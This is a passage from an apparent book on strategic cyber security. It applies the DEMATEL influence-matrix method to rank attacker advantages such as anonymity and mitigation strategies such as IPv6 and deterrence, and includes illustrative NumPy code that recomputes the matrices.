Affairs Program at the Battelle Memorial Institute in Geneva. It is used to solve scientific, political and economic problems that contain a complex array of important factors,436 which may involve many stakeholders.437 It has often been used, especially by researchers in Middle East and Far East, to inves- tigate problems of strategic scope and significance.438 First, a DEMATEL researcher must identify and classify the key concepts or the most influential factors in a given system or in a particular area of research. 
Second, all factors are placed into a pair-wise, “direct-influence” comparison matrix and prioritized by their level of influence on the other factors in the system: zero, or “no influence,” to four, or “very high influence.” The matrix isolates all of the factors within the system, as well as their one-to-one relationships.439 It displays the level of influence that each factor exerts on every other factor in the system, and provides a clear ranking of alternatives by influence level.440 Third, the influencing factors are depicted in a causal loop diagram that graphically displays how each factor exerts pressure on, and receives pressure from, all other factors in the system, including the strength of each influence relationship. 436 Gabus & Fontela, 1972; Gabus & Fontela, 1973. 437 Jafari et al, 2008. 438 Several are cited in this paper, below. 439 Hu et al, 2010. 440 Dytczak & Ginda, 2010. 133 DEMATEL and Strategic Analysis Fourth, DEMATEL calculates the combined effect of both the direct and indirect influence relationships, yielding a new overall influence score for all factors in the system. It is then possible to place all factors into a hierarchical structure. In this way, DEMATEL helps to provide decision makers with the most efficient paths to a desired outcome. These contribute to workable solutions at the tactical level441 and superior policy choices at the strategic level.442 DEMATEL Influencing Factors Parts II and III of this book described cyber security as an emerging strategic con- cept and examined four mitigation strategies that governments will likely adopt to counter the cyber attack threat. Fig. 1, below, summarizes these concepts as DEMA- TEL “influencing factors.” Each is defined in more detail in this chapter. Figure 1. DEMATEL “Influencing Factors.” National Security Threats A cyber attack is best understood not as an end in itself, but as an extraordinary means to a wide variety of ends. At the tactical level, there are many objectives that an attacker seeks. Here are five of the most important. 441 Hu et al, 2010. 442 Moghaddam et al, 2010. 134 DATA ANALYSIS AND RESEARCH RESULTS Espionage. Every day, anonymous computer hackers steal vast quantities of com- puter data and network communications. In fact, it is possible to conduct devastat- ing intelligence-gathering operations, even on highly sensitive political and military communications, remotely from anywhere in the world. Propaganda. Cheap and effective, this is often the easiest and the most powerful form of cyber attack. Propaganda dissemination may not need to incorporate any computer hacking at all, but simply take advantage of the amplification power of the Internet. Digital information, in text or image format and regardless of whether it is true – can be instantly copied and sent anywhere in the world, even deep behind enemy lines. And provocative information that is censored from the Web can reap- pear elsewhere in seconds. Denial-of-Service (DoS). The simple strategy behind a DoS attack is to deny the use of data or a computer resource to legitimate users. The most common tactic is to flood the target with so much superfluous data that it cannot respond to real requests for services or information. Today, black market botnets provide anyone with massive Distributed DoS (DDoS) resources and a high level of anonymity. 
Other DoS attacks include the physical destruction of computer hardware and the use of electromagnetic interference, designed to destroy unshielded electronics via current or voltage surges. Data modification. A successful attack on the integrity of sensitive data is insidious because legitimate users (human or machine) may make subsequent critical deci- sions based on maliciously altered information. Such attacks range from website de- facement, which is often referred to as “electronic graffiti,” but which can still carry propaganda or disinformation, to the corruption of advanced weapons or command- and-control (C2) systems. Infrastructure manipulation. National critical infrastructures are, like everything else, increasingly connected to the Internet. However, because instant response may be required, and associated hardware could have insufficient computing resources, security may not be robust. Furthermore, the infrastructure could require instant or automatic response, so it may be unrealistic to expect that a human would be avail- able to concur with every command the infrastructure is given.443 Complicating matters is the fact that most critical infrastructures are in private hands. Internet Service Providers (ISP), for example, typically lease communication lines to government as well as to commercial entities, and it is not uncommon for 443 Geers, 2009. 135 DEMATEL and Strategic Analysis satellite management corporations to offer bandwidth to multiple countries at the same time.444 The management of electricity is essential for national security planners to evaluate because electricity has no substitute, and all other infrastructures, including com- puter networks, depend on it.445 Finally, it is important to note that many critical in- frastructures are in private hands, outside of government protection and oversight. Key Cyber Attack Advantages As a medium through which a nation-state or a non-state actor can threaten the security or national security of a rival or adversary, cyberspace offers attackers numerous key advantages that facilitate and amplify the three traditional attack categories of confidentiality, integrity and availability. These are illustrated in Fig. 2, below. Figure 2. Key Cyber Attack Advantages. Vulnerability. The Internet has an ingenious modular design that is remarkably resilient in the face of many classes of cyber attack. However, hackers regularly find sufficient flaws in its architecture to secretly read, delete, or modify informa- tion stored on or traveling between computers. Further, the rapid proliferation in 444 Ibid. 445 Divis, 2005. 136 DATA ANALYSIS AND RESEARCH RESULTS communications technologies provides sensitive sites with a level of redundancy unimagined in the past. However, on the downside it is a challenge for defenders to keep up with the latest attack methods. In fact, there are about 100 additions to the Common Vulnerabilities and Exposures (CVE) database each month.446 Constantly evolving malicious code often gives hackers more paths into a network than its sys- tem administrators can protect. Asymmetry. Nations, organizations, and individual hackers find in computer hack- ing a very high return on investment. An attacker’s common goals are self-explana- tory: the theft of research and development data, eavesdropping on sensitive com- munications, and the delivery of propaganda behind enemy lines. 
The elegance of computer hacking lies in the fact that it may be attempted for a fraction of the cost – and risk – of many other information collection or manipulation strategies. Anonymity. The maze-like architecture of the Internet offers cyber attackers a high degree of anonymity. Smart hackers route their attacks through countries with which the victim’s government has poor diplomatic relations or no law enforcement cooperation. Even successful cyber investigations often lead only to another hacked computer. Governments today face the prospect of losing a cyber conflict without even knowing the identity of their adversary. Inadequacy of cyber defense. Computer network security is still an immature disci- pline. Traditional security skills are of marginal help in cyber warfare and it is diffi- cult to retain personnel with marketable technical expertise. Challenging computer investigations are further complicated by the international nature of the Internet. Moreover, in the case of state-sponsored cyber operations, law enforcement coop- eration is naturally non-existent. The rise of non-state actors. The Internet era offers to everyone vastly increased participation on the world stage. Historically, governments have endeavored to re- tain as much control as they can over international conflict. However, globalization and the Internet have considerably strengthened the ability of anyone to follow cur- rent events and have provided a powerful means to influence them. Domestic and transnational subcultures now spontaneously coalesce online, sway myriad political agendas, and may not report to any traditional chain-of-command. A future chal- lenge for world leaders is whether their own citizens could spin delicate interna- tional diplomacy out of control. 446 “Common Vulnerabilities and Exposures List,” The MITRE Corporation, http://cve.mitre.org/. 137 DEMATEL and Strategic Analysis Cyber Attack Categories There are three basic forms of cyber attack, from which all others derive. Confidentiality. This encompasses any unauthorized acquisition of information, including surreptitious “traffic analysis,” in which an attacker infers communica- tion content merely by observing communication patterns. Because global network connectivity is currently well ahead of global network security, it can be easy for hackers to steal enormous amounts of information. Cyber terrorism and cyber warfare may still lie in our future, but we are already liv- ing in a Golden Age of cyber espionage. The most famous case to date is “GhostNet,” investigated by Information Warfare Monitor, in which a cyber espionage network of over 1,000 compromised computers in 103 countries targeted diplomatic, politi- cal, economic, and military information.447 Integrity. This is the unauthorized modification of information or information re- sources such as a database. Integrity attacks can involve the “sabotage” of data for criminal, political, or military purposes. Cyber criminals have encrypted data on a victim’s hard drive and then demanded a ransom payment in exchange for the decryption key. Governments that censor Google results return part, but not all of the search engine’s suggestions to an end user. Availability. The goal here is to prevent authorized users from gaining access to the systems or data they require to perform certain tasks. 
This is commonly referred to as a denial-of-service (DoS) and encompasses a wide range of malware, network traffic, or physical attacks on computers, databases and the networks that connect them.

In 2000, "MafiaBoy," a 15-year-old student from Montreal, conducted a successful DoS attack against some of the world's biggest online companies, likely causing over $1 billion in financial damage.448 In 2007, Syrian air defense was reportedly disabled by a cyber attack moments before the Israeli air force demolished an alleged Syrian nuclear reactor.

447 "Tracking GhostNet..." 2009.
448 Verton, 2002.

Strategic Cyber Attack Targets

Cyber attacks of strategic significance do not occur every day. In fact, it is likely that the most powerful cyber weapons may be saved by militaries and intelligence agencies for times of international conflict and war.

Some war tactics will change in order to account for the unique nature of cyberspace and for the latent power of cyber warfare, but the ultimate goal of war – victory – will not change. As in past wars and as with other types of aggression, there are two broad categories of strategic targets that cyber attackers will strike.

Military forces. The first category of cyber attacks would be conducted as part of a broader effort to disable the adversary's weaponry and to disrupt military command-and-control (C2) systems.

In 1997, the U.S. Department of Defense (DoD) held a large-scale cyber attack red team exercise called Eligible Receiver. The simulation was a success. As James Adams wrote in Foreign Affairs, thirty-five National Security Agency (NSA) personnel, posing as North Korean hackers, used a variety of cyber-enabled information warfare tactics to "infect the human command-and-control system with a paralyzing level of mistrust ... as a result, nobody in the chain of command, from the president on down, could believe anything."449

In 2008, unknown hackers broke into a wide range of DoD computers, including a "highly protected classified network" of Central Command (CENTCOM), the organization which manages both wars in which the U.S. is now engaged. The Pentagon was so alarmed by the attack that Chairman of the Joint Chiefs Michael Mullen personally briefed President Bush on the incident.450

In the event of a future war between major world powers, it is wise to assume that the above-mentioned attacks would pale in comparison to the sophistication and scale of cyber tools and tactics that governments may hold in reserve for a time of national security crisis.

Government/civilian infrastructure. The second category of cyber attacks would target the adversary's ability and willingness to wage war for an extended period of time. The targets would likely include an adversary's financial sector, industry, and national morale.

One of the most effective ways to undermine a variety of these second-tier targets is to disrupt the generation and supply of power. President Obama's announcement that unknown hackers had "probed our electrical grid" and "plunged entire cities into darkness"451 in Brazil452 should serve as a wake-up call for many.

449 Adams, 2001.
450 Barnes, 2008.

Referring to theoretical cyber attacks on the financial sector, former U.S.
Director of National Intelligence (DNI) Mike McConnell stated that his primary concern was not the theft of money, but a cyber attack that would target the integrity of the financial system itself, designed to destroy public confidence in the security and supply of money.453 In a future war between major world powers, militaries would likely exploit the ubiq- uity of cyberspace and global connectivity to conduct a wide range of cyber attacks against adversary national critical infrastructures, on their home soil, deep behind the front lines of battle. Cyber Attack Mitigation Strategies This research has shown that cyber attackers possess significant advantages over cyber defenders, and that governments must now take the threat of strategic-level cyber attacks seriously. The four mitigation strategies examined in Part III are sum- marized below. Fig. 3 is a causal loop diagram that shows how cyber attack mitigation strategies are designed to reduce the impact of cyber attack advantages, with the ultimate goal of reducing threats to national security via cyberspace. Figure 3. Cyber Attack Mitigation Strategies. 451 “Remarks...” 2009. 452 “Cyber War...” 2009. 453 Ibid. 140 DATA ANALYSIS AND RESEARCH RESULTS IPv6: The complex and evolving nature of IT tends to favor an attacker, who often finds a surfeit of network vulnerabilities to exploit. At the same time, the benefits of connectivity continue to ensure that returning to pen and paper is not an option. If there is a leading current technical solution to the cyber attack problem, a reason- able argument can be made for Internet Protocol version 6 (IPv6), which is replacing IPv4 as the “language” of the Internet. The first benefit of IPv6 is that it instantly solves the world’s shortage of computer addresses.454 However, its chief security enhancement – mandatory support for Internet Protocol Security (IPSec) – is in fact an optional feature that may not be widely used for reasons of convenience. Fur- thermore, during the long transition phase ahead, there will be an increased “attack surface” as hackers exploit vulnerabilities in both IP languages at once.455 Military doctrine: Cyberspace is a new warfare domain, in which computers are both a weapon and a target. Future military concepts and doctrine must find a way to encompass cyber attack and defense strategies and tactics. However, even the most influential military treatise in history, Sun Tzu’s Art of War, which is renowned for its flexibility and adaptability to new means and methods of war, has great dif- ficulty subsuming many aspects of cyber warfare. The author described ten distinc- tive characteristics of the cyber battlefield, none of which fits easily into Sun Tzu’s paradigm. Deterrence: There are only two deterrence strategies available to nation-states: de- nial of a threatening technology (e.g., nuclear weapons) and punishment. With cyber weapons, denial is a non-starter because hacker skills and tools are easy to acquire. Punishment via retaliation is the only option, but to be an effective deterrent, a threat has to be credible. Here again, the challenges of poor attacker attribution and high attack asymmetry in cyberspace undermine the credibility of deterrence. 
Further, they create problematic doctrinal questions for military rules of engagement.456

Arms Control: In the future, world leaders may negotiate an international treaty on the use of cyber weapons.457 However, arms control relies on two principles that are not easy to apply in cyberspace: prohibition and inspection. First, it is difficult to prohibit something that is hard to define, such as malicious code. And even in a malware-free organization, hackers are adept at using legitimate paths to network access, such as by guessing or stealing a password. Second, it is hard to inspect something that is difficult to count: a USB Flash drive now holds up to 256 GB or over 2 trillion bits of data, and in the U.S. alone, there are over 400 million Internet-connected computers.458

454 IPv4 contains around 4 billion IP addresses; IPv6 has 340 undecillion, or 50 octillion IPs for every human on planet Earth.
455 Geers & Eisen, 2007.
456 Geers, 2010b.
457 Markoff & Kramer, 2009a: Russian negotiators have long argued that an international treaty, similar to those that have been signed for WMD, could help to mitigate the cyber threat. In 2009, the U.S. was reportedly more willing to discuss this proposal than in the past.
458 Geers, 2010c.

A summary of the four mitigation strategies and their relative effectiveness is depicted in Fig. 4.

Strategy Evaluation: all could help, but each is only a partial solution.
• IPv6: increases attribution by lowering anonymity; IPSec authenticates and encrypts, but is not mandatory; long, dangerous transition phase.
• Art of War: Sun Tzu good but not perfect; concepts and law behind the tech curve; cyber warfare has distinctive characteristics.
• Deterrence: denial difficult, hacker skills easy to acquire; punishment lacks credibility; low attribution, high asymmetry, no one dies.
• Arms Control: how to prohibit what is hard to define? how to inspect cyberspace? political will could change dynamics.
Figure 4. Mitigation Strategy Effectiveness.

This chapter summarized the key concepts, or influencing factors, in this research. The next chapter will examine the two most important concept categories – "key cyber attack advantages" and "cyber attack mitigation strategies" – with the aid of DEMATEL. The goal is to derive a more precise conclusion to this book via stronger scientific method.

10. KEY FINDINGS

The author will employ the DEMATEL method to analyze the two most important categories of influencing factors in this research – cyber attack advantages and cyber attack mitigation strategies – with four primary objectives in mind:
• to understand how the key concepts in this book, both individually and categorically, influence one another;
• to visualize the system they comprise with the aid of a causal loop diagram;
• to understand the extent to which the system may be controllable; and
• to prioritize the mitigation strategies for decision makers according to their impact on reducing the cyber attack advantages and on positively affecting the system of strategic cyber security as a whole.

The "Expert Knowledge" Matrix

Matrix X, depicted in Fig. 5, is a DEMATEL "Expert Knowledge" influence matrix that juxtaposes the cyber attack advantages and mitigation strategies according to their level of influence on one another. The advantages are lettered A-E, and the strategies are F-I.
Each individual influence value in the matrix is based on the research presented in this book and on the author's judgment as a subject matter expert with over ten years working as a cyber intelligence analyst. As detailed in the Bibliography, the author has published peer-reviewed research examining and evaluating the efficacy of all nine influence factors.

For future research purposes, it is clear that different influence estimates will pertain in different national contexts, and that the dynamic nature of cyberspace will ensure that most if not all the variables will change over time. The reader is thus encouraged to tailor the matrix to his or her needs and to aggregate or disaggregate individual influence factors for more general or for more specific research goals. The mathematics, however, are well-founded, and remain the same.

DEMATEL "Expert Knowledge" Influence Matrix X (None = 0, Low = 1, Medium = 2, High = 3, Very High = 4). Columns A-I follow the same factor order as the rows; the final column is each row's "Direct Influence" total, and the bottom row is each column's "Level Influenced" total.

                                  A   B   C   D   E   F   G   H   I   Direct Influence
A  IT Vulnerabilities             0   4   4   4   3   3   2   3   3         26
B  Asymmetry                      2   0   1   4   4   2   4   4   3         24
C  Anonymity                      2   4   0   4   4   4   4   4   4         30
D  Inadequate Cyber Defense       4   3   3   0   2   2   3   4   2         23
E  Empowered Non-State Actors     1   2   2   1   0   2   4   3   3         18
F  Next Gen Internet: IPv6        3   2   4   2   1   0   2   2   2         18
G  Best Mil Doctrine: Sun Tzu     3   3   2   4   2   1   0   4   2         21
H  Cyber Attack Deterrence        1   2   2   2   2   1   2   0   3         15
I  Cyber Arms Control             1   1   2   2   2   1   2   3   0         14
   Level Influenced              17  21  20  23  20  16  23  27  22

Figure 5. DEMATEL "Expert Knowledge" Influence Matrix X.

A quick glance at Matrix X shows that it is dominated by the cyber attack advantages, which are much more influential in this system of influences than the mitigation strategies. The average "direct influence" strength of the advantages is 24.2, versus a mitigation strategy average of 17. The attack advantages also possess the overwhelming majority of scoring at the "very high" influence level: 17 to 3.

This result appears intuitive. It correlates to the common perception in the world today that cyber attackers have enormous advantages over their cyber defense counterparts. Fig. 6, below, ranks all factors in Matrix X by the simple addition of their individual influence levels, by row. To keep them visually distinct, the advantages are in yellow, and the mitigation strategies are colored dark green.

Factor                            Direct Influence
C  Anonymity                            30
A  IT Vulnerabilities                   26
B  Asymmetry                            24
D  Inadequate Cyber Defense             23
G  Best Mil Doctrine: Sun Tzu           21
E  Empowered Non-State Actors           18
F  Next Gen Internet: IPv6              18
H  Cyber Attack Deterrence              15
I  Cyber Arms Control                   14

Figure 6. "Direct Influence" by Factor.

According to Matrix X, the most influential factor in strategic cyber security today is the ability of so many cyber attackers to remain anonymous to their victims. The second most important factor is the seemingly endless list of IT vulnerabilities from which cyber attackers are able to choose. The most effective mitigation strategy in this list, and the only one to rank as more influential than any one of the attacker advantages, is the application of the world's most influential military treatise, Sun Tzu's Art of War, to cyber conflict.
The least influential mitigation strategy is cyber arms control, which suffers enormously from the fact that it is difficult to define a cyber weapon and even more difficult to conduct a cyber weapons inspection.

Fig. 7 adds the columns of Matrix X in order to show each factor's level of susceptibility to influence from the other factors in the matrix.

Factor                            Susceptibility to Influence
H  Cyber Attack Deterrence              27
G  Best Mil Doctrine: Sun Tzu           23
D  Inadequate Cyber Defense             23
I  Cyber Arms Control                   22
B  Asymmetry                            21
E  Empowered Non-State Actors           20
C  Anonymity                            20
A  IT Vulnerabilities                   17
F  Next Gen Internet: IPv6              16

Figure 7. Susceptibility to Influence.

The results are intriguing: both the highest- and lowest-ranked factors are mitigation strategies. This appears illogical, but a closer look reveals why. The most influenced factor in Matrix X – deterrence – is a purely psychological condition, highly dependent on human perception and emotion; thus, it is not surprising that deterrence would be highly susceptible to outside influence. The least influenced factor is IPv6, which is pure technology and therefore tied to human failings to a far lesser degree.

Unfortunately for cyber defense, this list shows that cyber attack advantages not only have a higher "direct influence" score than the mitigation strategies, but that they are also more resistant to outside influence. In Fig. 7, the mitigation strategies have an average score of 22, compared to just 20.2 for the advantages. IPv6 scores well, but the other three strategies do not.

One way to interpret Fig. 7 is to view the "susceptibility to influence" score as a measure of a factor's reliability, as well as the confidence that a decision maker could place in it. Thus, cyber attackers are able to rely on their advantages to a much greater degree than cyber defenders can count on current attack mitigation strategies. At this point in time, three examined strategies – deterrence, doctrine, and arms control – are of dubious help to cyber defense.

Perhaps even more ominously, the two most influential cyber attack advantages – anonymity and IT vulnerabilities – are also the two most difficult cyber attack advantages to influence. Thus, they may prove extremely difficult challenges for cyber defenders to overcome in the future.

On a positive note, Fig. 7 shows that finding ways to improve cyber defense, such as by hiring the right personnel and by providing them quality training, could yield a high return on investment. "Inadequate cyber defense" has the fourth-highest "direct influence" score in Matrix X, and it is also the third-highest factor in terms of susceptibility to outside influence. This makes it a critical factor in the strategic cyber security environment.

Causal Loop Diagram

The next step in DEMATEL analysis involves constructing a causal loop diagram, as seen in Fig. 8. Such a visual representation of complex data can facilitate human understanding by making the information clearer and more compelling. All factors are placed into a systemic cause-and-effect illustration.

In general, the fewer parameters a system contains, the easier it is to control, and the easier it is to display in a graph. Matrix X is large enough – 9x9, or 81 values – that it is already a complex system. In order to make the diagram most useful for this analysis, the author has chosen to display only the "very high" levels of influence between the factors in Matrix X.

Figure 8.
Strategic Cyber Security: Causal Loop Diagram. 147 Key Findings The color of each factor is shaded according to the number of “very high” levels of influence it projects to the other factors in the system. Thus, as “anonymity” is the most influential factor in Matrix X, it has the darkest color of all factors in Fig. 8. Anonymity impacts almost every other factor in the system at the highest possible level. Two factors, deterrence and arms control, remain white because they do not affect any other factor at the highest level. These are the least influential factors in Matrix X, in Fig. 6, and in this diagram. Cyber attack deterrence, in particular, is dominated by four other, high-impact factors, making it the most susceptible of all factors to outside influence, and the least reliable mitigation strategy for strategic cyber de- fense. A causal loop diagram reveals another key aspect of the interrelationship between factors in a system: some have multiple important connections to other factors, re- gardless of whether the influence is given or received, while others have few. After anonymity – asymmetry, military doctrine, and inadequate cyber defense each have at least five “very high” influence relationships with other factors. This allows them to play a critical role in the system. If decision makers are able to change the nature of any one of these factors in a significant way, the resultant impact on the system as a whole could be considerable. Calculating Indirect Influence A close analysis of the causal loop diagram above reveals that each factor not only has a direct influence on every other factor in the system, but that it also has indirect or transitive influences on the other factors. Eventually, every factor in the system will even influence itself. Fig. 9 below depicts the dynamic of indirect influence at work. Figure 9. Indirect Influence. 148 DATA ANALYSIS AND RESEARCH RESULTS The DEMATEL method is one of the easiest and most useful ways to calculate the sum of direct and indirect influences for a group of interrelated factors.459 First, Matrix X is transformed into normalized Matrix D. The new numbers are derived by dividing the values in Matrix X by the single highest sum found in the rows/ columns, which is Anonymity (whose “direct influence” score is 30). Thus, the new influence levels are: 0=0, 1=.0333, 2=.0667, 3=.1000, and 4=.1333. Matrix D is depicted in Fig. 10. A B C D E F G H I DEMATEL Normalized Matrix D IT Vulnerabilities Asymmetry Anonymity Inadequate Cyber Defense Empowered Non-State Actors Next Gen Internet: IPv6 Best Mil Doctrine: Sun Tzu Cyber Attack Deterrence Cyber Arms Control A IT Vulnerabilities 0 .1333 .1333 .1333 .1000 .1000 .0667 .1000 .1000 B Asymmetry .0667 0 .0333 .1333 .1333 .0667 .1333 .1333 .1000 C Anonymity .0667 .1333 0 .1333 .1333 .1333 .1333 .1333 .1333 D Inadequate Cyber Defense .1333 .1000 .1000 0 .0667 .0667 .1000 .1333 .0667 E Empowered Non-State Actors .0333 .0667 .0667 .0333 0 .0667 .1333 .1000 .1000 F Next Gen Internet: IPv6 .1000 .0667 .1333 .0667 .0333 0 .0667 .0667 .0667 G Best Mil Doctrine: Sun Tzu .1000 .1000 .0667 .1333 .0667 .0333 0 .1333 .0667 H Cyber Attack Deterrence .0333 .0667 .0667 .0667 .0667 .0333 .0667 0 .1000 I Cyber Arms Control .0333 .0333 .0667 .0667 .0667 .0333 .0667 .1000 0 Figure 10. DEMATEL-Normalized Matrix D. 459 Moghaddam et al, 2010. 
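For readers who wish to reproduce the normalization step, the following is a minimal illustrative sketch, not part of the original study, assuming Python with NumPy. It encodes the Matrix X values from Fig. 5 and recomputes the row totals of Fig. 6, the column totals of Fig. 7, and the normalized Matrix D of Fig. 10 (to four decimal places).

```python
import numpy as np

# Direct-influence values transcribed from Matrix X (Fig. 5).
# Rows and columns both follow the factor order A-I:
# A IT Vulnerabilities, B Asymmetry, C Anonymity, D Inadequate Cyber Defense,
# E Empowered Non-State Actors, F IPv6, G Sun Tzu, H Deterrence, I Arms Control.
X = np.array([
    [0, 4, 4, 4, 3, 3, 2, 3, 3],   # A
    [2, 0, 1, 4, 4, 2, 4, 4, 3],   # B
    [2, 4, 0, 4, 4, 4, 4, 4, 4],   # C
    [4, 3, 3, 0, 2, 2, 3, 4, 2],   # D
    [1, 2, 2, 1, 0, 2, 4, 3, 3],   # E
    [3, 2, 4, 2, 1, 0, 2, 2, 2],   # F
    [3, 3, 2, 4, 2, 1, 0, 4, 2],   # G
    [1, 2, 2, 2, 2, 1, 2, 0, 3],   # H
    [1, 1, 2, 2, 2, 1, 2, 3, 0],   # I
], dtype=float)

direct_influence = X.sum(axis=1)   # row totals    -> Fig. 6 (Anonymity = 30, ..., Arms Control = 14)
susceptibility   = X.sum(axis=0)   # column totals -> Fig. 7 (Deterrence = 27, ..., IPv6 = 16)

# Normalize by the largest row total (Anonymity, 30), as described in the text,
# so that 4 -> 0.1333, 3 -> 0.1000, 2 -> 0.0667, 1 -> 0.0333.
D = X / direct_influence.max()     # -> Matrix D of Fig. 10

print(direct_influence, susceptibility, np.round(D, 4), sep="\n")
```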
149 Key Findings Second, Matrix D is transformed into “Total Influence” Matrix T, in which DEMATEL calculates both the direct and indirect influence levels for each factor.460 Matrix T is illustrated in Fig. 11. A B C D E F G H I DEMATEL “Total Influence” Matrix T IT Vulnerabilities Asymmetry Anonymity Inadequate Cyber Defense Empowered Non-State Actors Next Gen Internet: IPv6 Best Mil Doctrine: Sun Tzu Cyber Attack Deterrence Cyber Arms Control Direct Influence A IT Vulnerabilities .1850 .3441 .3298 .3645 .3095 .2643 .3114 .3799 .3285 2.8170 B Asymmetry .2257 .1954 .2186 .3324 .3075 .2077 .3365 .3747 .2979 2.4964 C Anonymity .2664 .3632 .2310 .3867 .3556 .3047 .3911 .4366 .3785 3.1138 D Inadequate Cyber Defense .2842 .2944 .2801 .2223 .2579 .2162 .3101 .3771 .2753 2.5176 E Empowered Non-State Actors .1562 .2117 .2022 .1997 .1448 .1738 .2856 .2867 .2508 1.9115 F Next Gen Internet: IPv6 .2274 .2305 .2765 .2462 .1947 .1295 .2427 .2740 .2374 2.0589 G Best Mil Doctrine: Sun Tzu .2420 .2749 .2329 .3201 .2397 .1712 .1999 .3555 .2550 2.2912 H Cyber Attack Deterrence .1386 .1906 .1821 .2038 .1884 .1304 .2063 .1687 .2289 1.6378 I Cyber Arms Control .1317 .1543 .1755 .1937 .1791 .1242 .1961 .2482 .1290 1.5318 Indirect Influence 1.8572 2.2591 2.1287 2.4694 2.1772 1.7220 2.4797 2.9014 2.3813 Figure 11. “Total Influence” Matrix T. The indirect influences not only transform the matrix, but also transform our under- standing of the nature of the system. Indirect influences are “feedback” influences, which allow each factor to influence every other factor in the system, and over time, to influence even itself. 460 The DEMATEL formula here is T=D * (E-D)^-1, where E is the identity matrix. Analyzing Total Influence Based on DEMATEL-calculated indirect influences, Fig. 12 reveals a more complete picture of cause and effect, based on the “total influence” of each factor within the system. Factor Direct Influence Index Indirect Influence Index Total Influence *** Anonymity 3.1138 2.1287 5.2425 Inadequate Cyber Defense 2.5176 2.4694 4.9870 Best Mil Doctrine: Sun Tzu 2.2912 2.4797 4.7709 Asymmetry 2.4964 2.2591 4.7555 IT Vulnerabilities 2.8170 1.8572 4.6742 Cyber Attack Deterrence 1.6378 2.9014 4.5392 Empowered Non-State Actors 1.9115 2.1772 4.0887 Cyber Arms Control 1.5318 2.3813 3.9131 Next Gen Internet: IPv6 2.0589 1.7220 3.7809 Figure 12. Initial Total Influence Index. The combined direct and indirect “total influence” calculation yields an alternative ranking of the factors. Here, the top four are the same factors identified in the causal loop diagram as having the highest number of very influential relationships with other factors, regardless of whether the influence was given or received. Anonymity is still the most important factor in the system. However, the addition of indirect influence scores reorders other factors in the list. Inadequate cyber defense and military doctrine surpassed IT vulnerabilities and asymmetry in importance (compared to Fig. 6), while deterrence and arms control gained influence at the ex- pense of non-state actors and IPv6. The final step of this DEMATEL analysis subtracts the indirect influences from the direct influences in Fig. 12 to create a final normalized total influence index, which is shown in Fig. 13. 
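Before turning to Fig. 13, the total-influence calculation described in footnote 460 can be reproduced in the same way. The sketch below is again illustrative rather than the author's own tooling; it assumes NumPy, re-encodes Matrix X from Fig. 5, and derives Matrix T (Fig. 11), the combined total influence (Fig. 12), and the final normalized index (Fig. 13).

```python
import numpy as np

# Matrix X from Fig. 5; rows and columns follow the factor order A-I.
X = np.array([
    [0, 4, 4, 4, 3, 3, 2, 3, 3],
    [2, 0, 1, 4, 4, 2, 4, 4, 3],
    [2, 4, 0, 4, 4, 4, 4, 4, 4],
    [4, 3, 3, 0, 2, 2, 3, 4, 2],
    [1, 2, 2, 1, 0, 2, 4, 3, 3],
    [3, 2, 4, 2, 1, 0, 2, 2, 2],
    [3, 3, 2, 4, 2, 1, 0, 4, 2],
    [1, 2, 2, 2, 2, 1, 2, 0, 3],
    [1, 1, 2, 2, 2, 1, 2, 3, 0],
], dtype=float)

D = X / X.sum(axis=1).max()          # normalized Matrix D (Fig. 10)
E = np.eye(9)                        # identity matrix, written "E" in footnote 460
T = D @ np.linalg.inv(E - D)         # total-influence Matrix T (Fig. 11): T = D(E - D)^-1

direct_idx   = T.sum(axis=1)         # row sums: the book's "direct influence index"
indirect_idx = T.sum(axis=0)         # column sums: the book's "indirect influence index"

total_influence = direct_idx + indirect_idx   # Fig. 12 (e.g., Anonymity ~5.24)
final_index     = direct_idx - indirect_idx   # Fig. 13 (e.g., Anonymity ~0.99, Deterrence ~-1.26)

factors = ["IT Vulnerabilities", "Asymmetry", "Anonymity", "Inadequate Cyber Defense",
           "Empowered Non-State Actors", "Next Gen Internet: IPv6",
           "Best Mil Doctrine: Sun Tzu", "Cyber Attack Deterrence", "Cyber Arms Control"]
for name, score in sorted(zip(factors, final_index), key=lambda p: -p[1]):
    print(f"{name:30s} {score:+.4f}")
```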
150 DATA ANALYSIS AND RESEARCH RESULTS 151 Key Findings DEMATEL Normalized “Total Influence” Index Score 1 Anonymity .9851 2 IT Vulnerabilities .9598 3 Next Gen Internet: IPv6 .3369 4 Asymmetry .2373 5 Inadequate Cyber Defense .0481 6 Best Mil Doctrine: Sun Tzu -.1886 7 Empowered Non-State Actors -.2654 8 Cyber Arms Control -.8496 9 Cyber Attack Deterrence -1.2636 Figure 13. Final Total Influence Index. After this final calculation, the overall ranking by factor returns closer to the origi- nal direct influence ranking in Fig. 6. In fact, the order of the cyber attack advan- tages is unchanged, as seen in Fig. 14. BEFORE AFTER 1. Anonymity 1. Anonymity 2. IT Vulnerabilities 2. IT Vulnerabilities 3. Asymmetry 3. Asymmetry 4. Inadequate Cyber Defense 4. Inadequate Cyber Defense 5. Empowered Non-State Actors 5. Empowered Non-State Actors Figure 14. Cyber Attack Advantage Summary. However, there is now a much larger statistical gap between the two most impor- tant factors, anonymity and IT vulnerabilities, and the third and fourth place cyber attack advantages, asymmetry and inadequate cyber defense. Non-state actors re- ceived a negative overall score in the final index, which indicates that this concept is a net receiver, and not provider, of influence in the system of strategic cyber security today. The movement of the mitigation strategies in the final index is much more striking. Fig. 15 reveals that all four strategies moved in the list, especially IPv6, which was the only factor in the system to move more than one place in the overall ranking order. BEFORE AFTER 1. Doctrine: Sun Tzu 1. Next Gen Net: IPv6 2. Next Gen Net: IPv6 2. Doctrine: Sun Tzu 3. Deterrence 3. Arms Control 4. Arms Control 4. Deterrence Figure 15. Mitigation Strategy Summary. Following the final DEMATEL “total influence” calculation, IPv6 rose to the third- highest factor in strategic cyber security, behind only anonymity and IT vulner- abilities. Fig. 16 summarizes the factor rankings, before and after the inclusion of indirect influence scoring. Anonymity 30 Anonymity .9851 IT Vulnerabilities 26 IT Vulnerabilities .9598 Asymmetry 24 Next Gen Net: IPv6 .3369 Inadequate Cyber Defense 23 Asymmetry .2373 Doctrine: Sun Tzu 21 Inadequate Cyber Defense .0481 Empowered Non-State Actors 18 Doctrine: Sun Tzu -.1886 Next Gen Net: IPv6 18 Empowered Non-State Actors -.2654 Deterrence 15 Arms Control -.8496 Arms Control 14 Deterrence -1.2636 Figure 16. DEMATEL Indirect Influence Summary. This research suggests that IPv6 has the potential to be a more influential factor in strategic cyber security than three current cyber attack advantages, including asymmetry and inadequate cyber defense. This result is the most significant revela- tion in this study. DEMATEL analysis highlights two powerful IPv6 attributes. First, IPv6 is extremely resistant to outside influence, so it 